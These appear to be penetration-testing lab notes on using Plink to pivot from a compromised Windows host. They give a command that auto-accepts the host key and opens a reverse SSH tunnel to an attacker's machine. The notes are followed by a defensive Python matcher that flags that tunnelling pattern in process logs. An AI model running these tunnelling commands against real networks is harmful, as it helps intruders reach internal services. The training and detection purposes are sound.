- Is a Windows command line version of the PuTTY SSH client
- Our use of Plink tends to be a case of transporting the binary to the target, then using it to create a reverse connection.
- This would be done with the following command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
- To use our example from before, if we have access to `172.16.0.5` and would like to forward a connection to `172.16.0.10:80` back to port `8000` on our own attacking machine (`172.16.0.20`), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 USERNAME@172.16.0.20 -i KEYFILE -N
- Note that any keys generated by ssh-keygen will not work properly here.
- You will need to convert them using the `puttygen` tool, which can be installed on Kali using `sudo apt install putty-tools`. After downloading the tool, conversion can be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
- Plink is notorious for going out of date quickly, which often results in failing to connect back. Always make sure you have an up-to-date version of the .exe. Whilst there is a copy pre-installed on Kali at `/usr/share/windows-resources/binaries/plink.exe`
- Download the latest
- https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
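
The reverse-forward commands above leave a distinctive argument pattern in process-creation logs, and it survives the binary being renamed. The following is an added example, not part of the original notes: a small Python matcher for that pattern, where the function names, the indicator labels and the sample command lines are assumptions constructed for illustration.

```python
import re

# Argument shapes taken from the plink commands shown in these notes.
CHECKS = {
    "host_key_auto_accept": re.compile(r"\becho\s+y\s*\|", re.I),  # echo y | ...
    "no_shell": re.compile(r"(?:^|\s)-N(?=\s|$)"),                 # -N
    "key_file": re.compile(r"(?:^|\s)-i\s+\S+"),                   # -i KEYFILE
    "plink_name": re.compile(r"plink(?:\.exe)?\b", re.I),          # absent if renamed
}
# -R LOCAL_PORT:TARGET_IP:TARGET_PORT, with the optional bind address SSH allows
REMOTE_FWD = re.compile(
    r"(?:^|\s)-R\s+(?:[\w.\-]+:)?(\d{1,5}):([\w.\-]+):(\d{1,5})(?=\s|$)")
SSH_SERVER = re.compile(r"(?:^|\s)[\w.\-]+@([\w.\-]+)(?=\s|$)")    # USERNAME@HOST


def analyse(cmdline):
    """Describe the remote forward in one command line, or return None."""
    fwd = REMOTE_FWD.search(cmdline)
    if fwd is None:
        return None
    server = SSH_SERVER.search(cmdline)
    return {
        "listen_port": int(fwd.group(1)),            # opened on the SSH server
        "target": f"{fwd.group(2)}:{fwd.group(3)}",  # internal service exposed
        "ssh_server": server.group(1) if server else None,
        "indicators": [n for n, rx in CHECKS.items() if rx.search(cmdline)],
    }


def triage(events):
    """Keep only the command lines that request a remote forward."""
    return [(e, f) for e in events if (f := analyse(e)) is not None]


# Constructed process-creation command lines (not real logs).
SAMPLE_EVENTS = [
    r"cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 USERNAME@172.16.0.20 -i KEYFILE -N",
    r"C:\Windows\Temp\svc.exe -R 8000:172.16.0.10:80 USERNAME@172.16.0.20 -i KEYFILE -N",
    r"plink.exe -batch admin@fileserver dir",
]

if __name__ == "__main__":
    for cmdline, finding in triage(SAMPLE_EVENTS):
        print(finding, "<=", cmdline)
```

The second sample shows why the match keys on the `-R` argument rather than the file name: the forward is still reported with `no_shell` and `key_file` even though `plink_name` is missing.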